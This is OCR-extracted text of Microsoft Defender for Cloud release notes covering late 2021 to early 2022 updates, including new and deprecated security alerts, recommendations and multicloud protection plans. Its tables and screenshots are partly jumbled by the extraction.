Network traffic data collection Defender for Cloud uses the Microsoft Dependency agent to collect Medium 
agent should be installed on network traffic data from your Azure virtual machines to enable 
Linux virtual machines advanced network protection features such as traffic visualization on 

the network map, network hardening recommendations and specific 

network threats. 


Network traffic data collection Defender for Cloud uses the Microsoft Dependency agent to collect Medium 
agent should be installed on network traffic data from your Azure virtual machines to enable 
Windows virtual machines advanced network protection features such as traffic visualization on 

the network map, network hardening recommendations, and specific 

network threats. 


Defender for Containers can now scan for vulnerabilities in 
Windows images (preview) 


Defender for Container's image scan now supports Windows images that are hosted in Azure 
Container Registry. This feature is free while in preview, and will incur a cost when it becomes generally 


available. 


Learn more in Use Microsoft Defender for Container to scan your images for vulnerabilities. 


New alert for Microsoft Defender for Storage (preview) 


To expand the threat protections provided by Microsoft Defender for Storage, we've added a new 


preview alert. 


Threat actors use applications and tools to discover and access storage accounts. Microsoft Defender 
for Storage detects these applications and tools so that you can block them and remediate your 


posture. 


This preview alert is called Access from a suspicious application. The alert is relevant to Azure Blob 


Storage, and ADLS Gen2 only. 


Alert (alert type) Description MITRE Severity 
tactic 

PREVIEW - Access from a Indicates that a suspicious application has successfully Initial Medium 

suspicious application accessed a container of a storage account with Access 

(Storage.Blob_SuspiciousApp) authentication. 


This might indicate that an attacker has obtained the 
credentials necessary to access the account, and is 
exploiting it. This could also be an indication of a 
penetration test carried out in your organization. 
Applies to: Azure Blob Storage, Azure Data Lake Storage 
Gen2 


Configure email notifications settings from an alert 


A new section has been added to the alert User Interface (UI) which allows you to view and edit who 
will receive email notifications for alerts that are triggered on the current subscription. 


^ tal Configure email notification settings 


Configure who'll get emails regarding security alerts for this subscription. 


Configure settings 


Learn how to Configure email notifications for security alerts. 


Deprecated preview alert: 
ARM.MCAS _ActivityFromAnonymousIPAddresses 


The following preview alert has been deprecated: 


Alert name Description 


PREVIEW - Activity from a risky IP address Users activity from an IP address that has been identified as 
(ARM.MCAS _ActivityFromAnonymouslPAddresses) an anonymous proxy IP address has been detected. 
These proxies are used by people who want to hide their 
device's IP address, and can be used for malicious intent. This 
detection uses a machine learning algorithm that reduces 
false positives, such as mis-tagged IP addresses that are 
widely used by users in the organization. 
Requires an active Microsoft Defender for Cloud Apps license. 


A new alert has been created that provides this information and adds to it. In addition, the newer alerts 
(ARM_OperationFromSuspiciousIP, ARM_OperationFromSuspiciousProxylP) don't require a license for 


Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security). 


See more alerts for Resource Manager. 


Moved the recommendation Vulnerabilities in container security 
configurations should be remediated from the secure score to best 
practices 


The recommendation Vulnerabilities in container security configurations should be remediated 


has been moved from the secure score section to best practices section. 


The current user experience only provides the score when all compliance checks have passed. Most 
customers have difficulties with meeting all the required checks. We're working on an improved 
experience for this recommendation, and once released the recommendation will be moved back to 


the secure score. 


Deprecated the recommendation to use service principals to 
protect your subscriptions 


As organizations move away from using management certificates to manage their subscriptions, and 
our recent announcement that we're retiring the Cloud Services (classic) deployment model”, we 


deprecated the following Defender for Cloud recommendation and its related policy: 


Recommendation Description Severity 
Service principals should be Management certificates allow anyone who authenticates with them Medium 
used to protect your to manage the subscription(s) they're associated with. To manage 

subscriptions instead of subscriptions more securely, using service principals with Resource 
Management Certificates Manager is recommended to limit the blast radius in the case of a 


certificate compromise. It also automates resource management. 
(Related policy: Service principals should be used to protect your 
subscriptions instead of management certificates £ ) 


Learn more: 


e Cloud Services (classic) deployment model is retiring on 31 August 2024 Z 
e Overview of Azure Cloud Services (classic) 
e Workflow of Microsoft Azure classic VM Architecture - including RDFE workflow basics 


Legacy implementation of ISO 27001 replaced with new ISO 
27001:2013 initiative 


The legacy implementation of ISO 27001 has been removed from Defender for Cloud's regulatory 
compliance dashboard. If you're tracking your ISO 27001 compliance with Defender for Cloud, 


onboard the new ISO 27001:2013 standard for all relevant management groups or subscriptions. 
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Deprecated Microsoft Defender for loT device recommendations 


Microsoft Defender for loT device recommendations is no longer visible in Microsoft Defender for 


Cloud. These recommendations are still available on Microsoft Defender for loT's Recommendations 


page. 


The following recommendations are deprecated: 


Assessment key 
1a36f14a-8bd8-45f5-abe5-eef88d76ab5b: loT Devices 
ba975338-f956-41e7-a9f2-7614832d382d: loT Devices 
beb62be3-5e78-49bd-ac5f-099250ef3c7c: loT Devices 
d5a8d84a-9ad0-42e2-80e0-d38e3d46028a: loT Devices 
5f65e47f-7a00-4bf3-acae-90ee441ee876: loT Devices 
a9a59ebb-5d6f-42f5-92a1 -036fd0fd1879: loT Devices 
2acc27c6-5fdb-405e-9080-cb66b850c8f5: loT Devices 


d74d2738-2485-4103-9919-69c7e63776ec: loT Devices 


Recommendations 

Open Ports On Device 

Permissive firewall rule in the input chain was found 
Permissive firewall policy in one of the chains was found 
Permissive firewall rule in the output chain was found 
Operating system baseline validation failure 

Agent sending underutilized messages 

TLS cipher suite upgrade needed 


Auditd process stopped sending events 


Deprecated Microsoft Defender for loT device alerts 


All of Microsoft's Defender for loT device alerts are no longer visible in Microsoft Defender for Cloud. 


These alerts are still available on Microsoft Defender for loT's Alert page, and in Microsoft Sentinel. 


Posture management and threat protection for AWS and GCP 
released for general availability (GA) 


e Defender for Cloud's CSPM features extend to your AWS and GCP resources. This agentless plan 


assesses your multicloud resources according to cloud-specific security recommendations that 


are included in your secure score. The resources are assessed for compliance using the built-in 


standards. Defender for Cloud's asset inventory page is a multicloud enabled feature that allows 


you to manage your AWS resources alongside your Azure resources. 


e Microsoft Defender for Servers brings threat detection and advanced defenses to your compute 


instances in AWS and GCP. The Defender for Servers plan includes an integrated license for 
Microsoft Defender for Endpoint, vulnerability assessment scanning, and more. Learn about all of 


the supported features for virtual machines and servers. Automatic onboarding capabilities allow 


you to easily connect any existing or new compute instances discovered in your environment. 


Learn how to protect and connect your AWS environment and GCP organization with Microsoft 


Defender for Cloud. 


Registry scan for Windows images in ACR added support for 


national clouds 


Registry scan for Windows images is now supported in Azure Government and Microsoft Azure 


operated by 21Vianet. This addition is currently in preview. 


Learn more about our feature's availability. 


February 2022 


Updates in February include: 


e Kubernetes workload protection for Arc-enabled Kubernetes clusters 

e Native CSPM for GCP and threat protection for GCP compute instances 
e Microsoft Defender for Azure Cosmos DB plan released for preview 

e Threat protection for Google Kubernetes Engine (GKE) clusters 


Kubernetes workload protection for Arc-enabled Kubernetes 
clusters 


Defender for Containers previously only protected Kubernetes workloads running in Azure Kubernetes 
Service. We've now extended the protective coverage to include Azure Arc-enabled Kubernetes 
clusters. 


Learn how to set up your Kubernetes workload protection for AKS and Azure Arc enabled Kubernetes 
clusters. 


Native CSPM for GCP and threat protection for GCP compute 
instances 


The new automated onboarding of GCP environments allows you to protect GCP workloads with 
Microsoft Defender for Cloud. Defender for Cloud protects your resources with the following plans: 


e Defender for Cloud's CSPM features extend to your GCP resources. This agentless plan assesses 
your GCP resources according to the GCP-specific security recommendations, which are provided 
with Defender for Cloud. GCP recommendations are included in your secure score, and the 
resources will be assessed for compliance with the built-in GCP CIS standard. Defender for 
Cloud's asset inventory page is a multicloud enabled feature helping you manage your resources 
across Azure, AWS, and GCP. 


e Microsoft Defender for Servers brings threat detection and advanced defenses to your GCP 
compute instances. This plan includes the integrated license for Microsoft Defender for Endpoint, 


vulnerability assessment scanning, and more. 


For a full list of available features, see Supported features for virtual machines and servers. 
Automatic onboarding capabilities will allow you to easily connect any existing, and new compute 


instances discovered in your environment. 


Learn how to protect, and connect your GCP projects with Microsoft Defender for Cloud. 


Microsoft Defender for Azure Cosmos DB plan released for preview 


We have extended Microsoft Defender for Cloud's database coverage. You can now enable protection 
for your Azure Cosmos DB databases. 


Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects any attempt 
to exploit databases in your Azure Cosmos DB accounts. Microsoft Defender for Azure Cosmos DB 
detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious 
access patterns, and potential exploitation of your database through compromised identities, or 


malicious insiders. 
It continuously analyzes the customer data stream generated by the Azure Cosmos DB services. 


When potentially malicious activities are detected, security alerts are generated. These alerts are 
displayed in Microsoft Defender for Cloud together with the details of the suspicious activity along 


with the relevant investigation steps, remediation actions, and security recommendations. 


There's no impact on database performance when enabling the service, because Defender for Azure 
Cosmos DB doesn't access the Azure Cosmos DB account data. 


Learn more at Overview of Microsoft Defender for Azure Cosmos DB. 


We're also introducing a new enablement experience for database security. You can now enable 
Microsoft Defender for Cloud protection on your subscription to protect all database types, such as, 
Azure Cosmos DB, Azure SQL Database, Azure SQL servers on machines, and Microsoft Defender for 
open-source relational databases through one enablement process. Specific resource types can be 
included, or excluded by configuring your plan. 


Learn how to enable your database security at the subscription level. 


Threat protection for Google Kubernetes Engine (GKE) clusters 


Following our recent announcement Native CSPM for GCP and threat protection for GCP compute 
instances, Microsoft Defender for Containers has extended its Kubernetes threat protection, behavioral 
analytics, and built-in admission control policies to Google's Kubernetes Engine (GKE) Standard 
clusters. You can easily onboard any existing, or new GKE Standard clusters to your environment 
through our Automatic onboarding capabilities. Check out Container security with Microsoft Defender 
for Cloud, for a full list of available features. 


January 2022 


Updates in January include: 


e Microsoft Defender for Resource Manager updated with new alerts and greater emphasis on 
high-risk operations mapped to MITRE ATT&CK® Matrix 

e Recommendations to enable Microsoft Defender plans on workspaces (in preview) 

e Auto provision Log Analytics agent to Azure Arc-enabled machines (preview) 

e Deprecated the recommendation to classify sensitive data in SQL databases 

e Communication with suspicious domain alert expanded to included known Log4Shell-related 
domains 


e ‘Copy alert JSON' button added to security alert details pane 


e Renamed two recommendations 

e Deprecate Kubernetes cluster containers should only listen on allowed ports policy 
e Added ‘Active Alerts' workbook 

e ‘System update’ recommendation added to government cloud 


Microsoft Defender for Resource Manager updated with new alerts 
and greater emphasis on high-risk operations mapped to MITRE 
ATT&CK® Matrix 


The cloud management layer is a crucial service connected to all your cloud resources. Because of this, 
it's also a potential target for attackers. We recommend security operations teams closely monitor the 
resource management layer. 


Microsoft Defender for Resource Manager automatically monitors the resource management 
operations in your organization, whether they're performed through the Azure portal, Azure REST APIs, 
Azure CLI, or other Azure programmatic clients. Defender for Cloud runs advanced security analytics to 
detect threats and alerts you about suspicious activity. 


The plan's protections greatly enhance an organization's resiliency against attacks from threat actors 
and significantly increase the number of Azure resources protected by Defender for Cloud. 


In December 2020, we introduced the preview of Defender for Resource Manager, and in May 2021 the 


plan was release for general availability. 


With this update, we've comprehensively revised the focus of the Microsoft Defender for Resource 
Manager plan. The updated plan includes many new alerts focused on identifying suspicious 
invocation of high-risk operations. These new alerts provide extensive monitoring for attacks across 
the complete MITRE ATT&CK® matrix for cloud-based techniques £. 


This matrix covers the following range of potential intentions of threat actors who may be targeting 
your organization's resources: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, 
Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, and Impact. 


The new alerts for this Defender plan cover these intentions as shown in the following table. 


Q Tip 
These alerts also appear in the alerts reference page. 
Alert (alert type) Description MITRE Severity 


tactics 
(intentions) 


Suspicious invocation of a high-risk ‘Initial Microsoft Defender for Resource Initial Access Medium 
Access' operation detected (Preview) Manager identified a suspicious 
(ARM_AnomalousOperation.|nitial[Access) invocation of a high-risk operation 


in your subscription, which might 
indicate an attempt to access 
restricted resources. The identified 
operations are designed to allow 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Execution’ 
operation detected (Preview) 
(ARM_AnomalousOperation.Execution) 


Suspicious invocation of a high-risk 
‘Persistence’ operation detected (Preview) 
(ARM_AnomalousOperation.Persistence) 


Suspicious invocation of a high-risk ‘Privilege 
Escalation’ operation detected (Preview) 
(ARM_AnomalousOperation.PrivilegeEscalation) 


MITRE 
tactics 
(intentions) 


Description 


administrators to efficiently access 
their environments. While this 
activity may be legitimate, a threat 
actor might utilize such operations 
to gain initial access to restricted 
resources in your environment. This 
can indicate that the account is 
compromised and is being used 
with malicious intent. 


Microsoft Defender for Resource Execution 
Manager identified a suspicious 
invocation of a high-risk operation 
on a machine in your subscription, 
which might indicate an attempt to 
execute code. The identified 
operations are designed to allow 
administrators to efficiently manage 
their environments. While this 
activity may be legitimate, a threat 
actor might utilize such operations 
to access restricted credentials and 
compromise resources in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


Microsoft Defender for Resource Persistence 
Manager identified a suspicious 
invocation of a high-risk operation 
in your subscription, which might 
indicate an attempt to establish 
persistence. The identified 
operations are designed to allow 
administrators to efficiently manage 
their environments. While this 
activity may be legitimate, a threat 
actor might utilize such operations 
to establish persistence in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


Microsoft Defender for Resource Privilege 


Manager identified a suspicious Escalation 
invocation of a high-risk operation 

in your subscription, which might 

indicate an attempt to escalate 

privileges. The identified operations 

are designed to allow 

administrators to efficiently manage 

their environments. While this 


activity may be legitimate, a threat 


Severity 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Defense 
Evasion’ operation detected (Preview) 
(ARM_AnomalousOperation.DefenseEvasion) 


Suspicious invocation of a high-risk ‘Credential 
Access' operation detected (Preview) 
(ARM_AnomalousOperation.CredentialAccess) 


Suspicious invocation of a high-risk ‘Lateral 
Movement' operation detected (Preview) 
(ARM_AnomalousOperation.LateralMovement) 


MITRE 
tactics 
(intentions) 


Description 


actor might utilize such operations 
to escalate privileges while 
compromising resources in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


Microsoft Defender for Resource Defense 


Manager identified a suspicious Evasion 
invocation of a high-risk operation 
in your subscription, which might 
indicate an attempt to evade 
defenses. The identified operations 
are designed to allow 
administrators to efficiently manage 
the security posture of their 
environments. While this activity 
may be legitimate, a threat actor 
might utilize such operations to 
avoid being detected while 
compromising resources in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


Microsoft Defender for Resource Credential 


Manager identified a suspicious Access 
invocation of a high-risk operation 
in your subscription, which might 
indicate an attempt to access 
credentials. The identified 
operations are designed to allow 
administrators to efficiently access 
their environments. While this 
activity may be legitimate, a threat 
actor might utilize such operations 
to access restricted credentials and 
compromise resources in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


Microsoft Defender for Resource Lateral 


Manager identified a suspicious Movement 
invocation of a high-risk operation 

in your subscription, which might 

indicate an attempt to perform 

lateral movement. The identified 

operations are designed to allow 

administrators to efficiently manage 

their environments. While this 

activity may be legitimate, a threat 

actor might utilize such operations 


Severity 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Data 
Collection’ operation detected (Preview) 
(ARM_AnomalousOperation.Collection) 


Suspicious invocation of a high-risk ‘Impact’ 
operation detected (Preview) 
(ARM_AnomalousOperation.Impact) 


Description 


to compromise additional resources 
in your environment. This can 
indicate that the account is 
compromised and is being used 
with malicious intent. 


Microsoft Defender for Resource 
Manager identified a suspicious 
invocation of a high-risk operation 
in your subscription, which might 
indicate an attempt to collect data. 
The identified operations are 
designed to allow administrators to 
efficiently manage their 
environments. While this activity 
may be legitimate, a threat actor 
might utilize such operations to 
collect sensitive data on resources 
in your environment. This can 
indicate that the account is 
compromised and is being used 
with malicious intent. 


Microsoft Defender for Resource 
Manager identified a suspicious 
invocation of a high-risk operation 
in your subscription, which might 
indicate an attempted configuration 
change. The identified operations 
are designed to allow 
administrators to efficiently manage 
their environments. While this 
activity may be legitimate, a threat 
actor might utilize such operations 
to access restricted credentials and 
compromise resources in your 
environment. This can indicate that 
the account is compromised and is 
being used with malicious intent. 


In addition, these two alerts from this plan have come out of preview: 


Alert (alert type) 


Azure Resource Manager operation from 
suspicious IP address 
(ARM_OperationFromSuspicious!P) 


Azure Resource Manager operation from 
suspicious proxy IP address 


Description 


Microsoft Defender for Resource 
Manager detected an operation from an 
IP address that has been marked as 
suspicious in threat intelligence feeds. 


Microsoft Defender for Resource 
Manager detected a resource 


MITRE 
tactics 


(intentions) 


Collection 


Impact 


MITRE 
tactics 
(intentions) 


Execution 


Defense 
Evasion 


Severity 


Medium 


Medium 


Severity 


Medium 


Medium 


Alert (alert type) Description MITRE Severity 
tactics 
(intentions) 


(ARM_OperationFromSuspiciousProxy!P) management operation from an IP 
address that is associated with proxy 
services, such as TOR. While this 
behavior can be legitimate, it's often 
seen in malicious activities, when threat 
actors try to hide their source IP. 


Recommendations to enable Microsoft Defender plans on 
workspaces (in preview) 


To benefit from all of the security features available from Microsoft Defender for Servers and Microsoft 
Defender for SQL on machines, the plans must be enabled on both the subscription and workspace 


levels. 


When a machine is in a subscription with one of these plan enabled, you'll be billed for the full 
protections. However, if that machine is reporting to a workspace without the plan enabled, you won't 
actually receive those benefits. 


We've added two recommendations that highlight workspaces without these plans enabled, that 
nevertheless have machines reporting to them from subscriptions that do have the plan enabled. 


The two recommendations, which both offer automated remediation (the 'Fix' action), are: 


Recommendation Description Severity 
Microsoft Defender for Microsoft Defender for Servers brings threat detection and advanced Medium 
Servers should be enabled defenses for your Windows and Linux machines. 

on workspaces 7 With this Defender plan enabled on your subscriptions but not on your 


workspaces, you're paying for the full capability of Microsoft Defender for 
Servers but missing out on some of the benefits. 

When you enable Microsoft Defender for Servers on a workspace, all 
machines reporting to that workspace will be billed for Microsoft 
Defender for Servers - even if they're in subscriptions without Defender 
plans enabled. Unless you also enable Microsoft Defender for Servers on 
the subscription, those machines won't be able to take advantage of just- 
in-time VM access, adaptive application controls, and network detections 
for Azure resources. 

Learn more in Overview of Microsoft Defender for Servers. 

(No related policy) 


Microsoft Defender for Microsoft Defender for Servers brings threat detection and advanced Medium 
SQL on machines should defenses for your Windows and Linux machines. 
be enabled on workspaces % With this Defender plan enabled on your subscriptions but not on your 

workspaces, you're paying for the full capability of Microsoft Defender for 

Servers but missing out on some of the benefits. 

When you enable Microsoft Defender for Servers on a workspace, all 

machines reporting to that workspace will be billed for Microsoft 

Defender for Servers - even if they're in subscriptions without Defender 

plans enabled. Unless you also enable Microsoft Defender for Servers on 

the subscription, those machines won't be able to take advantage of just- 


Recommendation Description Severity 


in-time VM access, adaptive application controls, and network detections 
for Azure resources. 

Learn more in Overview of Microsoft Defender for Servers. 

(No related policy) 


Auto provision Log Analytics agent to Azure Arc-enabled machines 
(preview) 


Defender for Cloud uses the Log Analytics agent to gather security-related data from machines. The 
agent reads various security-related configurations and event logs and copies the data to your 
workspace for analysis. 


Defender for Cloud's auto provisioning settings has a toggle for each type of supported extension, 
including the Log Analytics agent. 


In a further expansion of our hybrid cloud features, we've added an option to auto provision the Log 
Analytics agent to machines connected to Azure Arc. 


As with the other auto provisioning options, this is configured at the subscription level. 


When you enable this option, you'll be prompted for the workspace. 


O Note 


For this preview, you can't select the default workspaces that was created by Defender for Cloud. 
To ensure you receive the full set of security features available for the Azure Arc-enabled servers, 
verify that you have the relevant security solution installed on the selected workspace. 


Dashboard > Microsoft Defender for Cloud > Settings 


>x Settings | Auto provisioning 


Contoso Infra2 


P Search (Ctri+/) | 


Settings 


Defender plans Auto provisioning - Extensions 


* Auto provisioning Defender for Cloud collects security data and events from your resources and services to help you prevent, detect, and respond to threats. 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. Learn more 
Email notifications 


Integrations Enable all extensions 


a 
SO 
GA workflow automation 
a 


Continuous export Extension Status Resources missing extension Description Configuration 
Policy settings Log Analytics agent for Azure VMs €D On E 5 of 34 virtual machines Collects security-related configurations and event Selected workspace: 
Show in inventory logs from the machine and stores the data in your nsg 
= Security policy € Log Analytics workspace for analysis. Learn more Security events: Common 


Edit configuration 


Log Analytics agent for Azure Arc Off 4 23 of 27 Azure Arc machines Collects security-related configurations and event - 
Machines (preview) Show in inventory logs from the machine and stores the data in your 


Log Analytics workspace for analysis. Learn more 


Deprecated the recommendation to classify sensitive data in SQL 
databases 


We've removed the recommendation Sensitive data in your SQL databases should be classified as 


part of an overhaul of how Defender for Cloud identifies and protects sensitive date in your cloud 


resources. 


Advance notice of this change appeared for the last six months in the Important upcoming changes to 
Microsoft Defender for Cloud page. 


Communication with suspicious domain alert expanded to included 
known Log4Shell-related domains 


The following alert was previously only available to organizations who had enabled the Microsoft 
Defender for DNS plan. 


With this update, the alert will also show for subscriptions with the Microsoft Defender for Servers or 
Defender for App Service plan enabled. 


In addition, Microsoft Threat Intelligence’ has expanded the list of known malicious domains to 


include domains associated with exploiting the widely publicized vulnerabilities associated with Log4j. 


Alert (alert type) Description MITRE tactics Severity 
Communication with suspicious domain Communication with suspicious Initial Access Medium 
identified by threat intelligence domain was detected by analyzing DNS Persistence / 
(AzureDNS_ThreatIntelSuspectDomain) transactions from your resource and Execution / 

comparing against known malicious Command And 

domains identified by threat Control / 

intelligence feeds. Communication to Exploitation 


malicious domains is frequently 
performed by attackers and could 
imply that your resource is 
compromised. 


‘Copy alert JSON' button added to security alert details pane 


To help our users quickly share an alert's details with others (for example, SOC analysts, resource 
owners, and developers) we've added the capability to easily extract all the details of a specific alert 
with one button from the security alert's details pane. 


The new Copy alert JSON button puts the alert’s details, in JSON format, into the user's clipboard. 
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Renamed two recommendations 


Attempted logon by a potentially harmful 


application sample alert 


High 25 Active ZO © 11/28/21, 11:51 AM (UTC... 


Severity Status Activity time 


Alert description D Copy alert JSON 
THIS IS A SAMPLE ALERT: A potentially harmful application attempted to access SQL 


server 'Sample-SQL’. 


Affected resource 


= 
lg Sample-DB 


? Playground 
Subscription 


MITRE ATT&CK® tactics © 


© Pre-attack 


View full details Take action 


For consistency with other recommendation names, we've renamed the following two 


recommendations: 


e Recommendation to resolve vulnerabilities discovered in running container images 


o Previous name: Vulnerabilities in running container images should be remediated (powered by 


Qualys) 


o New name: Running container images should have vulnerability findings resolved 


e Recommendation to enable diagnostic logs for Azure App Service 


o Previous name: Diagnostic logs should be enabled in App Service 


o New name: Diagnostic logs in App Service should be enabled 


Deprecate Kubernetes cluster containers should only listen on 
allowed ports policy 


We've deprecated the Kubernetes cluster containers should only listen on allowed ports 


recommendation. 


Policy name 


Kubernetes cluster 
containers should 
only listen on 
allowed ports E 


Description Effect(s) Version 
Restrict containers to listen only on allowed ports to secure access audit, 6.1.24 
to the Kubernetes cluster. This policy is generally available for deny, 


Kubernetes Service (AKS), and preview for AKS Engine and Azure Arc disabled 


enabled Kubernetes. For more information, see 


https://aka.ms/kubepolicydoc. 


The Services should listen on allowed ports only’ recommendation should be used to limit ports 


that an application exposes to the internet. 


Added ‘Active Alert' workbook 


To assist our users in their understanding of the active threats to their environments, and prioritize 
between active alerts during the remediation process, we've added the Active Alerts workbook. 


Home > Microsoft Defender for Cloud 


Microsoft Defender for Cloud | Workbooks | Gallery + 


iption 


+ New ©) Refresh ©) Feedback ? Help ©) Community Git repo v $ Browse across galleries 


General All Workbooks Public Templates My Templates 
E overview [Ø Filter by name orcategory | Subscription : All Resource Group: All Reset filters 
@ Getting started 
A Quick start 
¥= Recommendations 
@ Security alerts Empty 
A completely empty workbook. 
© Inventory 
@ Workbooks A Recently modified workbooks (0) 
Noitems found. 
GO Communit ity 
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© Workload protections ITZ 1094) vulnerability 
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E Firewal I Manager 


The active alerts workbook allows users to view a unified dashboard of their aggregated alerts by 
severity, type, tag, MITRE ATT&CK tactics, and location. Learn more in Use the ‘Active Alerts' workbook. 


‘System update’ recommendation added to government cloud 


The 'System updates should be installed on your machines' recommendation is now available on all 


government clouds. 


It's likely that this change will impact your government cloud subscription's secure score. We expect 
the change to lead to a decreased score, but it's possible the recommendation's inclusion might result 
in an increased score in some cases. 


December 2021 


Updates in December include: 


e Microsoft Defender for Containers plan released for general availability (GA) 

e Newalerts for Microsoft Defender for Storage released for general availability (GA) 
e Improvements to alerts for Microsoft Defender for Storage 

e 'PortSweeping’ alert removed from network layer alerts 


Microsoft Defender for Containers plan released for general 
availability (GA) 


Over two years ago, we introduced Defender for Kubernetes and Defender for container registries as 


part of the Azure Defender offering within Microsoft Defender for Cloud. 


With the release of Microsoft Defender for Containers, we've merged these two existing Defender 
plans. 


The new plan: 


e Combines the features of the two existing plans - threat detection for Kubernetes clusters and 
vulnerability assessment for images stored in container registries 

e Brings new and improved features - including multicloud support, host level threat detection 
with over sixty new Kubernetes-aware analytics, and vulnerability assessment for running images 

e Introduces Kubernetes-native at-scale onboarding - by default, when you enable the plan all 


relevant components are configured to be deployed automatically 


With this release, the availability and presentation of Defender for Kubernetes and Defender for 


container registries has changed as follows: 


e New subscriptions - The two previous container plans are no longer available 
e Existing subscriptions - Wherever they appear in the Azure portal, the plans are shown as 


Deprecated with instructions for how to upgrade to the newer plan 


ğ Open-source relational databases 0 servers ZETA of ) 
= Storage 10 storage accounts ( on ] Off ) 


GO Containers 2 container registries; 24 kub... 


we» Kubernetes (deprecated) 24 kubernetes cores © Update available © 


Qs Container registries (deprecated) 2 container registries © Update available © 


Ad Key Vault 0 key vaults 


The new plan is free for the month of December 2021. For the potential changes to the billing from the 
old plans to Defender for Containers, and for more information on the benefits introduced with this 


plan, see Introducing Microsoft Defender for Containers E, 
For more information, see: 


e Overview of Microsoft Defender for Containers 

e Enable Microsoft Defender for Containers 

e Introducing Microsoft Defender for Containers - Microsoft Tech Community E 

e Microsoft Defender for Containers | Defender for Cloud in the Field #3 - YouTube” 


New alerts for Microsoft Defender for Storage released for general 
availability (GA) 


Threat actors use tools and scripts to scan for publicly open containers in the hope of finding 


misconfigured open storage containers with sensitive data. 


Microsoft Defender for Storage detects these scanners so that you can block them and remediate your 


posture. 


The preview alert that detected this was called “Anonymous scan of public storage containers”. To 
provide greater clarity about the suspicious events discovered, we've divided this into two new alerts. 


These alerts are relevant to Azure Blob Storage only. 


We've improved the detection logic, updated the alert metadata, and changed the alert name and alert 


type. 


These are the new alerts: 


Alert (alert type) 


Publicly accessible storage containers successfully 
discovered 
(Storage.Blob_OpenContainersScanning.SuccessfulDiscovery) 


Publicly accessible storage containers unsuccessfully 
scanned 
(Storage.Blob_OpenContainersScanning.FailedAttempt) 


Description MITRE 
tactic 
A successful discovery of Collection 


publicly open storage 
container(s) in your 
storage account was 
performed in the last hour 
by a scanning script or 
tool. 


This usually indicates a 
reconnaissance attack, 
where the threat actor tries 
to list blobs by guessing 
container names, in the 
hope of finding 
misconfigured open 
storage containers with 
sensitive data in them. 


The threat actor may use 
their own script or use 
known scanning tools like 
Microburst to scan for 
publicly open containers. 


vV Azure Blob Storage 

X Azure Files 

X Azure Data Lake Storage 
Gen2 


A series of failed attempts Collection 
to scan for publicly open 

storage containers were 

performed in the last hour. 


This usually indicates a 
reconnaissance attack, 
where the threat actor tries 
to list blobs by guessing 
container names, in the 
hope of finding 
misconfigured open 
storage containers with 
sensitive data in them. 


The threat actor may use 
their own script or use 
known scanning tools like 
Microburst to scan for 
publicly open containers. 


vV Azure Blob Storage 
X Azure Files 


Severity 


Medium 


Low 


Alert (alert type) Description MITRE Severity 
tactic 


X Azure Data Lake Storage 
Gen2 


For more information, see: 


e Threat matrix for storage services E 
e Overview of Microsoft Defender for Storage 
e List of alerts provided by Microsoft Defender for Storage 


Improvements to alerts for Microsoft Defender for Storage 
The initial access alerts now have improved accuracy and more data to support investigation. 


Threat actors use various techniques in the initial access to gain a foothold within a network. Two of 
the Microsoft Defender for Storage alerts that detect behavioral anomalies in this stage now have 


improved detection logic and additional data to support investigations. 


If you've configured automations or defined alert suppression rules for these alerts in the past, update 


them in accordance with these changes. 


Detecting access from a Tor exit node 
Access from a Tor exit node might indicate a threat actor trying to hide their identity. 


The alert is now tuned to generate only for authenticated access, which results in higher accuracy and 
confidence that the activity is malicious. This enhancement reduces the benign positive rate. 


An outlying pattern will have high severity, while less anomalous patterns will have medium severity. 
The alert name and description have been updated. The AlertType remains unchanged. 


e Alert name (old): Access from a Tor exit node to a storage account 

e Alert name (new): Authenticated access from a Tor exit node 

e Alert types: Storage.Blob_TorAnomaly / Storage.Files_TorAnomaly 

e Description: One or more storage container(s) / file share(s) in your storage account were 
successfully accessed from an IP address known to be an active exit node of Tor (an anonymizing 
proxy). Threat actors use Tor to make it difficult to trace the activity back to them. Authenticated 
access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity. 
Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2 

e MITRE tactic: Initial access 

e Severity: High/Medium 


Unusual unauthenticated access 


A change in access patterns may indicate that a threat actor was able to exploit public read access to 
storage containers, either by exploiting a mistake in access configurations, or by changing the access 


permissions. 


This medium severity alert is now tuned with improved behavioral logic, higher accuracy, and 
confidence that the activity is malicious. This enhancement reduces the benign positive rate. 


The alert name and description have been updated. The AlertType remains unchanged. 


e Alert name (old): Anonymous access to a storage account 

e Alert name (new): Unusual unauthenticated access to a storage container 

e Alert types: Storage.Blob_AnonymousAccessAnomaly 

e Description: This storage account was accessed without authentication, which is a change in the 
common access pattern. Read access to this container is usually authenticated. This might 
indicate that a threat actor was able to exploit public read access to storage container(s) in this 
storage account(s). Applies to: Azure Blob Storage 

e MITRE tactic: Collection 


e Severity: Medium 
For more information, see: 


e Threat matrix for storage services E 
e Introduction to Microsoft Defender for Storage 
e List of alerts provided by Microsoft Defender for Storage 


‘PortSweeping’ alert removed from network layer alerts 


The following alert was removed from our network layer alerts due to inefficiencies: 


Alert (alert type) Description MITRE Severity 
tactics 


Possible outgoing Network traffic analysis detected suspicious outgoing traffic from % Discovery Medium 
port scanning {Compromised Host}. This traffic may be a result of a port scanning 
activity detected activity. When the compromised resource is a load balancer or an 
(PortSweeping) application gateway, the suspected outgoing traffic has been 
originated from to one or more of the resources in the backend pool 
(of the load balancer or application gateway). If this behavior is 
intentional, please note that performing port scanning is against 
Azure Terms of service. If this behavior is unintentional, it may mean 
your resource has been compromised. 


November 2021 


Our Ignite release includes: 


e Azure Security Center and Azure Defender become Microsoft Defender for Cloud 

e Native CSPM for AWS and threat protection for Amazon EKS, and AWS EC2 

